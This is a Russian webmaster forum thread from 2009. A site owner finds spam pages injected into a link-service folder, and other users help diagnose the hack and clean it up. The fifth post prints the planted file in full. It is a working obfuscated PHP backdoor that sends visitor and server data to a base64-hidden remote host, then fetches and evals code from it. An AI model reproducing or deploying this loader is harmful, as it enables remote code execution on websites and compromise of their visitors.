Страница 1 из 2 12 ПоследняяПоследняя
Показано с 1 по 10 из 11

Тема: Яндекс нашел левые страницы в папке с хэшем!!!

  1. #1

    Exclamation Яндекс нашел левые страницы в папке с хэшем!!!

    У меня в последние пару-тройку недель появилась следующая тенденция - сначала в индексе Яндекса на моих сайтах появляется несколько сотен новых страниц, а затем, через 2-3 Апа сайт выпадает из индекса.

    К сожалению, мысль о том, что эти два процесса взаимосвязаны пришла ко мне не сразу.

    Зато каково было моё удивление, когда сегодня я через Яндекс-вебмастер решил посмотреть, что это за страницы такие массово добавляются к моим сайтам. Выяснилось, что страницы эти лежат в папке с ХЭШем Линкфида! При чём страниц этих Яндекс загрузил от 1500 до 2500 по разным сайтам!!!
    При этом ссылок Линкфида на данных сайтах размещено где 500, а где и всего 5.

    При просмотре через FTP ничего лишнего в папке увидеть не удалось.
    Попытка просмотреть проиндексированные Яндексом "левые" страницы тоже ничего кроме ошибки 404 не дала. НО Яндекс позволяет просмотреть сохранённые копии этих страниц.
    Вот пример такой страницы: http://www.mavrikyi.ru/kennwort.htm

    Левые страницы Яндекс видит ТОЛЬКО в папке ХЭШа Линкфида.

    У кого наблюдается что-то подобное и кто может подсказать, что это и как с этой бедой бороться?
    Последний раз редактировалось Ростовчанин; 07.10.2009 в 16:09.

  2. #2
    Banned
    Регистрация
    27.09.2008
    Адрес
    Татарстан
    Сообщений
    1,928

    По умолчанию

    Проверьте свой .htaccess на предмет посторонних записей, смените все пароли и закройте папку с кодом LF в robots.txt

  3. #3

    По умолчанию

    Цитата Сообщение от lerko Посмотреть сообщение
    Проверьте свой .htaccess на предмет посторонних записей, смените все пароли и закройте папку с кодом LF в robots.txt
    В корневом .htaccess посторонних записей нет. А тот, что в папке ХЭШа содержит две строки:

    Options -MultiViews
    ErrorDocument 404 //хэш/6972.php

    Здесь мне трудно сказать лишние эти записи или нет, поскольку структура этого файла мне не известна.

    А если закрыть папку LF в robots.txt разве ссылки Линкфида в ERROR не выпадут?

  4. #4
    Banned
    Регистрация
    27.09.2008
    Адрес
    Татарстан
    Сообщений
    1,928

    По умолчанию

    Цитата Сообщение от Ростовчанин Посмотреть сообщение
    В корневом .htaccess посторонних записей нет. А тот, что в папке ХЭШа содержит две строки:

    Options -MultiViews
    ErrorDocument 404 //хэш/6972.php

    Здесь мне трудно сказать лишние эти записи или нет, поскольку структура этого файла мне не известна.

    А если закрыть папку LF в robots.txt разве ссылки Линкфида в ERROR не выпадут?
    1. В папке с хешем линкфида по умолчанию нет файла htaccess !!!
    2. Не выпадут

    Огласите содержимое файла 6972.php, похоже хакерская вставка

  5. #5

    По умолчанию

    Цитата Сообщение от lerko Посмотреть сообщение
    1. В папке с хешем линкфида по умолчанию нет файла htaccess !!!
    2. Не выпадут

    Огласите содержимое файла 6972.php, похоже хакерская вставка
    Вот содержимое 6972.php:

    PHP код:
    <? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="df381a614ab89ebe1664130522dce31c") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
    p.s. Мои познания в php слишком поверхностны, чтобы понимать этот текст.
    Последний раз редактировалось lerko; 07.10.2009 в 17:47.

  6. #6
    Banned
    Регистрация
    27.09.2008
    Адрес
    Татарстан
    Сообщений
    1,928

    По умолчанию

    Мои тоже , может кто разбирающийся посмотрит...
    Сносите нахрен это левый htaccess вместе с этим файлом и не забудьте также все рекомендации, приведенные выше. Просмотрите и другие папки сайта на предмет подобных файлов.

  7. #7

    По умолчанию

    Цитата Сообщение от lerko Посмотреть сообщение
    Мои тоже , может кто разбирающийся посмотрит...
    Сносите нахрен это левый htaccess вместе с этим файлом и не забудьте также все рекомендации, приведенные выше. Просмотрите и другие папки сайта на предмет подобных файлов.
    Уже занимаюсь. Жаль, что поздно кинулся. За последние несколько дней Яндекс подобавлял практически ко ВСЕМ моим сайтам по нескольку сотен страниц в индекс из папки с ХЭШем линкфида. Судя по тому, что в предыдущих случаях это приводило к скорому бану сайта, ничего хорошего им уже не светит.

  8. #8
    Старший модератор Аватар для FreeCat
    Регистрация
    01.10.2008
    Адрес
    nobody, anywhere
    Сообщений
    1,643

    По умолчанию

    Ростовчанин
    lerko
    похоже хакерская вставка
    ... может и хакерская, но единственный параметр, котоый не получается извне, а прописан в скрипте - это rssnews.ws. Узнавайте кто владелец и пр. .

  9. #9
    Админ форума Аватар для covenant
    Регистрация
    19.12.2008
    Сообщений
    982

    По умолчанию

    Я думаю -поломали Вас красиво. У меня была тут недавно на одной из площадок вообще "сказка", прописался червь файлом, что-то вроде dblinks.php.
    StrekHost.ru - просто хороший хостинг! Пользователям ЛФ, предоставим месяц бесплатно, пишите в личку.
    Правила форума! Их полезно знать.

    Мой блог!

  10. #10

    По умолчанию

    Цитата Сообщение от covenant Посмотреть сообщение
    Я думаю -поломали Вас красиво. У меня была тут недавно на одной из площадок вообще "сказка", прописался червь файлом, что-то вроде dblinks.php.
    Поломали красиво - это факт. Подробности взлома таковы: в одном из моих аккаунтов на хостинге во все папки всех доменов с правами 777 в течение одной минуты закинули по 2 файла. Очевидно - каким-то скриптом. Был ли при этом взломан пароль FTP или у злоумышленника просто был откуда-то список моих сайтов из этого аккаунта для меня остаётся неясным. Насколько я понимаю, для вброса файлов в папки с правами 777 не обязательно знать логин и пароль FTP.

    Папка с ХЭШем Линкфида у меня имеет как раз такие права. В некоторые другие папки эти файлы тоже попали, но почему-то Яндекс увидел только страницы в папке Линкфида.

    Буду пробовать переставлять права на всех папках на 755.

Похожие темы

  1. Скрипт нашел мало страниц.
    от saper507 в разделе Помощь начинающим
    Ответов: 4
    Последнее сообщение: 04.12.2009, 19:45
  2. Сервис синонимизации от Перепишем.ру
    от OZE в разделе Сервисы и программы для SEO
    Ответов: 47
    Последнее сообщение: 29.06.2009, 16:54
  3. Баги в верстке системы (пишем сюда)
    от covenant в разделе Баги
    Ответов: 54
    Последнее сообщение: 22.06.2009, 11:19
  4. Ответов: 15
    Последнее сообщение: 17.05.2009, 20:39
  5. Что в вашем понимании ГС?
    от Anfisa в разделе Курилка
    Ответов: 7
    Последнее сообщение: 27.04.2008, 18:13

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •